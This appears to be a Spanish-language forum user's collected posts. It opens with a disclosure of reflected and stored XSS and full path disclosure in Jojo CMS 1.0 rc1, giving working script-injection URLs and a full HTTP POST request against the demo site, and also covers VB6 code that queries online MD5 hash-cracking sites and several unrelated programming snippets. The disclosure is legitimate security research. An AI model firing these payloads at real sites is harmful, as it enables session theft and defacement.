Mensajes

es un cms que recien esta naciendo, pero como no me contestaron lo publico:



Nombre: Jojo cms
Web: http://www.jojocms.org/
Version: 1.0 rc1
Reporte: http://bugs.jojocms.org/details/task134
Fecha de reporte: Wednesday, 05 November 2008, 12:52 UTC+13:00
Parcheado: no
Tipo de vulnerabilidad: XSS y FPD


Cross site scripting (non-persistent) and Full path disclosure:
http://demo.jojocms.org/search/%3Cscript%3Ealert(%22wopa!%22)%3C/script%3E

Cross site scripting (persistent):
http://demo.jojocms.org/blog/1/welcome-to-jojocms/


HTTP HEADERS (I injected in 'name' variable):

Código [Seleccionar] Expandir


POST /blog/1/welcome-to-jojocms/ HTTP/1.1
Host: demo.jojocms.org
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 300
Connection: keep-alive
Referer: http://demo.jojocms.org/blog/1/welcome-to-jojocms/
Cookie: jojo=6cc641e1381c3201206cacfc9ce448ab; utma=119248274.775642559681182300.1225930562.1225930562.1225930562.1; utmb=119248274.1.10.1225930562; utmc=119248274; utmz=119248274.1225930562.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)
Content-Type: application/x-www-form-urlencoded
Content-Length: 182
userid=&name=%3Cscript%3Ealert%28%22XSS%22%29%3C%2Fscript%3E&email=asd%40asd.asd&website=http%3A%2F%2Fasd.net&anchortext=asd&captchacode=fhq&comment=asdsad&submit=Post+Comment+%3E%3E

RESULT:

Código [Seleccionar] Expandir

<div class="comment" id="article-comment-wrap-2">

<h4><a href="http://asd.net" target="new" rel="nofollow"><script>alert("XSS")</script></a><span class="date"> - Nov 5, 2008</span></h4>
<p id="article-comment-2" class="comment-text">asdsad</p>
</div>
</div>


sorry, my english is not good

quiero que el inet entre a una web, como x ejemplo http://md5.hashcracking.com/search.php?md5=21232f297a57a5a743894a0e4a801fc3 (a veces los datos hay que mandarlos por post). Y que de ahi saque el resultado qeu me da la web, para hacer esto yo ya se que hay antes y despues del resultado (por ejemplo, en esta antes hay "Cleartext of 21232f297a57a5a743894a0e4a801fc3 is " y despues nada)


edit:
una parte de donde saque la idea (perl)

Código (perl) [Seleccionar] Expandir

#busca en www.milw0rm.com/cracker
sub cracker2 {
$hash=shift(@_);
$agent=shift(@_);
my $url = "http://milw0rm.com/cracker/search.php";
my $conexion = LWP::UserAgent->new();
$conexion->agent($agent);
my $resultado = $conexion->get($url);

my $request = $conexion->post($url, ["hash" => $hash, "Submit" => "Submit"]);
my $content = $request->content;

my $code1 = "</TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>";
my $code2 = "</TD><TD align=\"middle\" nowrap=\"nowrap\" width=90>cracked</TD></TR>";
print "milw0rm.com          |   ";
if ($request->content =~ m/$code1(.*)$code2/) {
print "Cracked: $1\n";
} else {
print "Not Found\n";
}
}


edit2:
la primera ya funciono, tenia un error en

Código [Seleccionar] Expandir

If Despues = "" Then
    A(1) = 0
Else
    A(1) = InStr(1, Datos, Despues)
End If
iba

Código [Seleccionar] Expandir

If Despues = "" Then
    A(1) = Len(Datos)
Else
    A(1) = InStr(1, Datos, Despues)
End If

estoy haciendo una aplicacion de esas que buscan hashes crackeados por internet, pero al intentar buscar el hash (parecido a como lo vi en perl) en una web, no consigo obtener el html normalmente.

Código (vb) [Seleccionar] Expandir

Public Function BuscarHash(Web As String, PostData As String, Antes As String, Despues As String) As String
Dim A(1) As Long
Dim Indice As Integer
Dim Resultado As String

Indice = Crackeando


If PostData = "" Then
    frmMain.Net(Indice).Execute Web, "GET"
Else
    frmMain.Net(Indice).Execute Web, "POST", PostData
End If



'Datos parciales
Dim d_Chunk As Variant
' En esta variable se almacenan los datos finales
Dim Datos As String

Do
    DoEvents
Loop While frmMain.Net(Indice).StillExecuting = True

             d_Chunk = frmMain.Net(Indice).GetChunk(1024, icString)
             Datos = d_Chunk
       Do
             DoEvents
             ' Recupera una porción de datos de 1024 bytes
             d_Chunk = frmMain.Net(Indice).GetChunk(1024, icString)

             ' Si ya no hay mas sale
            If Len(d_Chunk) = 0 Then
                Exit Do
            Else
               Datos = Datos & d_Chunk
            End If
       Loop

If Antes = "" Then
    A(0) = 0
Else
    A(0) = InStr(1, Datos, Antes)
End If

If Despues = "" Then
    A(1) = 0
Else
    A(1) = InStr(1, Datos, Despues)
End If

Resultado = Mid(Datos, A(0) + Len(Antes), A(1) - A(0))

BuscarHash = Resultado

End Function


y lo llamo asi:

Código (vb) [Seleccionar] Expandir

    Me.tvHashes.Nodes.Add "HH" & Crackeando, tvwChild, "HHH1" & I, "md5.hashcracking.com: " & BuscarHash("http://md5.hashcracking.com/search.php?md5=" & Lista(Crackeando).Valor, "", "Cleartext of " & Lista(Crackeando).Valor & "  is ", "")
    Me.tvHashes.Nodes.Add "HH" & Crackeando, tvwChild, "HHH2" & I, "md5decryption.com: " & BuscarHash("http://md5decryption.com/", "hash=21232f297a57a5a743894a0e4a801fc3&submit=Decrypt+It%21", "<br><b class=""red"">Normal Text: </b>", "<br><script type=""text/javascript""><!--")


pero nunca llego a tener la web en Datos :S

alguna ayuda?

usa objeto.circle

ejemplo recien hecho (me tuve que fijar como se usaba circle xq nunca lo habia usado XD):

Código (vb) [Seleccionar] Expandir

Private Sub Form_Paint()
Dim i(2) As Long
Me.WindowState = 2
Do
DoEvents
Randomize Timer
i(0) = Rnd * 9000
Randomize Timer
i(1) = Rnd * 9000
Randomize Timer
i(2) = Rnd * 9000

Me.Circle (i(0), i(1)), i(2)
DoEvents
Loop
End Sub

el .isz es la imagen de disco, grabala con ultraiso o algun soft similar

subilo directo.. p2p es lento y rapidshare tambien... algun host gratis pero que te deje bajar bien

es la msdn completa o solo la parte de vb6? cualquiera de las dos me la bajo si la subis

lo de tipos de compilacion buscalo en el indice en un tema que es sobre aplicaciones (parte 2)

basicamente es que p-code no esta compilado del todo

mmm donde lo analisaste? es probable a ahora todos lo detecten XD

no creo, eso es novirusthanks

Código [Seleccionar] Expandir

lkaj8927o3ñldl-.ase,lñQ"U(·L!"·$%

usando instr se puede, de esta manera:

usamos una variable para determinar desde donde buscamos, la inicializamos a 0 para que empiece a buscar desde el principio
empieza el bucle
    busca con instr DESDE LA POSICION DE LA VARIABLE
    si instr dio resultados:
         la variable pasa a tener de valor la posicion de la cadena +1
    si no
          sale del bucle, la cadena no esta mas
vuelve al comienzo

o si no, podes hacer algo asi:

Código [Seleccionar] Expandir

For i = 1 To Len(Text1.Text)
MsgBox Mid(Text1, i, len("10021"))
Next i